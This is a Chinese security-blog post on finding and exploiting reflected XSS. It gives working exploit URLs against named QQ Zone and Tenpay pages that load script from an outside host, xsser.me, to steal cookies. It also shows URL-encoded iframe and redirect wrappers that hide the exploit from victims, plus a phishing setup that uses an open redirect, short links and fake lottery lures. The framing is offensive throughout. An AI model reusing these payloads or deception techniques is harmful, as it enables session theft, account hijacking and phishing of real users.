关注我们
QRcode 邮件联系 QRcode
主页 » 信息安全 » 正文

反射型XSS的寻找与利用方法

 feng  786 ℃  0条点评
1,反射xss大吗?
反射xss相比flashxss和存储xss要多多了.
so对于用户基数越大的网站,反射xss的威力就越大
因为多嘛,所以利用者会大增。
再者,存储的封的会快,而反射的封的相对不及时。
xss中,普遍认为存储的危害最大,那是要看你X谁了
如果你要x管理员,那肯定是存储的危害大
如果你要x更多的人(跟你同等身份的访问者),存储的xss可以写蠕虫,效果明显,反射也可以,效果次之。
如果你要x指定的人(跟你同等身份的访问者),两者效果一样

再读读这个
http://www.wooyun.org/bugs/wooyun-2010-011192

2,怎么找反射xss?
典型的工具,比如
http://www.3hack.com/tools/DOMinatorPro%E7%A0%B4%E8%A7%A3%E7%89%88.txt
http://www.3hack.com/paper/DOMinator%E4%BD%BF%E7%94%A8%E5%AE%9E%E4%BE%8B-%E8%A7%86%E9%A2%91.txt
当然还有更多,比如BurpSuite的xsssacn插件,还有一些个人写的专业的工具.

所以反射xss叫只要神器在手,不怕xss没有了。
某牛说,不用工具,一天找tx的能找几十个.所以说,有技术真可怕。

3,如何把反射xss利用的“天衣无缝”?
反射跟存储的不同点在什么地方,我们要知道,只要能弥补掉反射的不完美之处,我们才好去处理。

0x1,浏览器的因素,浏览器对反射xss的影响是最大的    解决:bypass各种浏览器,这是可以做到的。
0x2,反射的url容易被明眼人看出来 解决:使用iframe框架,url跳转

4.能看看实际案例吗??
A.
http://ctc.qzs.qq.com/qzone/v6/newlimit/index.html?s=1&uin=114967639));"><img src=l onerror=
xxxxxx  原型

exp:
http://ctc.qzs.qq.com/qzone/v6/newlimit/index.html?s=1&uin=114967639));"><img src=l onerror=e=document.createElement
('script');e.setAttribute('src','//xsser.me/9NkBwy?1353065417')
这个已经直接bypass各浏览器了。

A-1
我们直接框架到wooyun.org/index.html页面(举个例子哦)
在index.html <body>标签内添加
<script>
var exp='%68%74%74%70%3A%2F%2F%63%74%63%2E%71%7A%73%2E%71%71%2E%63%6F%6D%2F%71%7A%6F%6E%65%2F%76%36%2F%6E%65%77%6C%69%6
D%69%74%2F%69%6E%64%65%78%2E%68%74%6D%6C%3F%73%3D%31%26%75%69%6E%3D%31%31%34%39%36%37%36%33%39%29%29%3B%22%3E%3C%69%6D%
67%20%73%72%63%3D%6C%20%6F%6E%65%72%72%6F%72%3D%65%3D%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74
%28%27%73%63%72%69%70%74%27%29%3B%65%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%27%2F%2F%78%73%73%65%7
2%2E%6D%65%2F%39%4E%6B%42%77%79%3F%31%33%35%33%30%36%35%34%31%37%27%29';//上面EXP的完全RUL编码
urllll = unescape(exp); //解码
var e=document.createElement('iframe');
e.width=1;
e.height=1;
e.setAttribute('src',urllll);
document.body.appendChild(e);
</script>

用户体验:wooyun.org,抓到cookies传送到xssserme

A-2
如果不容许iframe怎么办?即,iframe之后,会跳出该src页面,岂不是暴露了
那就跳转吧
EXP:
http://ctc.qzs.qq.com/qzone/v6/newlimit/index.html?s=1&uin=114967639));"><img src=l onerror=e=document.createElement
('script');e.setAttribute('src','//xsser.me/9NkBwy?1353065417');document.body.appendChild(e);>&jump=http%3a%2f%2fuser.q
zone.qq.com%2f114967639

对了一句document.body.appendChild(e);>&jump=http%3a%2f%2fuser.qzone.qq.com%2f114967639

这个你可以写进xsser.me的js里面,这样url就跟第一个exp一样了。作用就是跳到正常页面去

<script>
var exp='%68%74%74%70%3A%2F%2F%63%74%63%2E%71%7A%73%2E%71%71%2E%63%6F%6D%2F%71%7A%6F%6E%65%2F%76%36%2F%6E%65%77%6C%69%6
D%69%74%2F%69%6E%64%65%78%2E%68%74%6D%6C%3F%73%3D%31%26%75%69%6E%3D%31%31%34%39%36%37%36%33%39%29%29%3B%22%3E%3C%69%6D%
67%20%73%72%63%3D%6C%20%6F%6E%65%72%72%6F%72%3D%65%3D%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74
%28%27%73%63%72%69%70%74%27%29%3B%65%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%27%2F%2F%78%73%73%65%7
2%2E%6D%65%2F%39%4E%6B%42%77%79%3F%31%33%35%33%30%36%35%34%31%37%27%29';
urllll = unescape(exp); //解码
window.location.href=urllll;//跳

用户体验:wooyun.org,跳转到exp地址,再跳到正常页面,因为exp地址跟正常页面地址变化是最后面,跳的也很快,不是技术型的,看不出来,

B.
如果exp不通用,就是要针对ie9,FF有不同的exp

也很简单,ie8,ie9,chrome bypass这样的文章很多,可以看看

那我们要做的就是
iframe exp.js      // exp.js负责判断浏览器版本,然后根据不同版本,输出不同的exp,针对打击
跟上面的A案例相比,就多一段js代码,即判断浏览器版本
要多写几个exp,跟A案例一样的形式,针对浏览器主要的有IE8.IE9.火狐.chrome.other(比如360.搜狗,都是用的ie内核)

把exp.js写成通用的,以后你有其他exp的时候,只需替换exp,就不用没次都写代码了,一劳永逸啊。

我写的给朋友看了,人家说非常烂,就不亮了,丢人。

C.
如果有一个完美的iframe xss,钓鱼的成功率相当之高
http://baoxian.tenpay.com/zhongmin.shtml?redirecturl=http://xj.hk/tenpay/

可以把http://xj.hk/tenpay/用tx微博短地址加密一下。

当然,这个xss也可以去用javascript去抓cookies,但是我觉得钓鱼的危害更大!

当时测试,两用型,如果你害怕对手不上当,可以借鉴案例A去抓cookies ,如果你觉得对手是小白
这个钓鱼的成功率是相当之高

D.
你即要抓cookies,又要钓鱼(太狠了点)

这样就有冲突,因为抓cookies的要点是当前url是其他网站,只是框架了tx的地址
而钓鱼,则必须url是tx的地址,才可信

所为鱼和胸罩不可得兼、

如果都是是纯小白,url又长,倒是可以试试
做起来很简单,比如案例A来说

在xsserme的js加上
top.document.body.innerHTML="<iframe width=100% height=100% frameborder=0 scrolling=no style=position:absolute;left:0;
top:0 src=http://xj.hk/tenpay/></iframe>";

做法跟A-2一样,用调转,比如,标题写着,tx抽奖活动,百分百中奖,大家快去领

把wooyun.org用tx短网址加密,或者直接发微博吧。。。

访问短网址之后,会二级跳到xss地址

这个时候,执行了xssserme的js,先抓了cookies,又重写了页面...............

作者:Y35U
本文标签:
黑客防线2012年12月刊PDF下载
[转]IE浏览器跟踪获取鼠标坐标POC
我是如何打造一款自动化SQL注入工具的我是如何打造一款自动化SQL注入工具的分析勒索软件Cerber的攻击方法分析勒索软件Cerber的攻击方法​分析Cknife,一个类似China Chopper的webshell管理工具(第二部分)​分析Cknife,一个类似China Chopper的webshell管理工具(第二部分)某个商业定向攻击活动分析某个商业定向攻击活动分析

已有0条评论,欢迎点评!

smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley

国际惯例, 沙发拿下 . . .


注册帐号  |  忘记密码